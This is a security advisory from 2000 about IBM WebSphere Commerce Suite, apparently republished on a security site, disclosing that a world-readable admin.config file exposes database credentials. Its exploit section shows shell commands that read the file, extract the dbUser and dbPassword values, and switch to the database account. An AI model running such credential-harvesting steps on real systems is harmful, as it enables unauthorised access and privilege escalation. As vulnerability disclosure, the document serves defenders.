[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : IBM WCS local user exceed his authority to access another file

Title: IBM WCS local user exceed his authority to access another file
Released by: CHINANSL
Date: 25th December 2000
Printable version: Click here
CHINANSL Security Advisory(CSA200013)



Topic: IBM WCS local user exceed his authority to 

access another file



Release Date Dec 25, 2000





Affected system:

============



IBM WCS(Websphere Commerce Suite)

  + Sun OS

  + Sun Solaris

  + Microsoft Windows NT

  + Microsoft Windows 2000

  + HP HP-UX 

  + IBM AIX

  + Linux





Impact: 

======



CHINANSL security team has found a security 

problem in IBM WCS. Exploitation

of this vulnerability, It is possible that a malicious local 

user can run 

arbitrary command to get root right.



Description

=========



IBM WCS is bussiness suite, after install it. A file 

named admin.config will be

produced, The user name and password to access 

that suite connect database will

be include in this file. and this file access right is -

rwxr-xr-x, So local user

can access it, and run some aibitrary command to 

get root right.



Exploit:

=====



Examples for Sun OS 5.7

$find admin.config |grep admin.config

/opt/WebSphere/AppServer/bin/admin.config

$cd /opt/WebSphere/AppServer/bin/

$grep dbUser admin.config

com.ibm.ejs.sm.adminServer.dbUser=db2admin

$grep dbPassword admin.config

com.ibm.ejs.sm.adminServer.dbUser=ibmdb2

$su - db2admin

password:ibmdb2

$id

uid=db2adminID(db2admin)



Examples for WIN2000:

d:\waserver\bin\>more admin.config

com.ibm.ejs.sm.adminServer.dbUser=ad2admin

com.ibm.ejs.sm.adminServer.dbPassword=ad2admi

n

...



Workaround:

=========



1、Config this product correctly.





Solution:

=======



None



DISCLAIMS:

========

THE INFORMATION PROVIDED IS RELEASED BY 

CHINANSL "AS IS" WITHOUT WARRANTY OF ANY

KIND. CHINANSL DISCLAIMS ALL WARRANTIES, 

EITHER EXPRESS OR IMPLIED, EXCEPT FOR 

THE WARRANTIES OF MERCHANTABILITY. IN NO 

EVENTSHALL CHINANSL BE LIABLE FOR ANY 

DAMAGES WHATSOEVER INCLUDING DIRECT, 

INDIRECT, INCIDENTAL,CONSEQUENTIAL, LOSS 

OF 

BUSINESS PROFITS OR SPECIAL DAMAGES, 

EVEN IF CHINANSL HAS BEEN ADVISED OF THE 

POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION 

OR REPRODUTION OF THE INFORMATION IS 

PROVIDED THAT THE ADVISORY IS NOT 

MODIFIED IN ANY WAY.



?Copyright 2000-2001 CHINANSL. All Rights 

Reserved. Terms of use.





CHINANSL Security Team 



CHINANSL INFORMATION TECHNOLOGY CO.,LTD

(http://www.chinansl.com)








(C) 1999-2000 All rights reserved.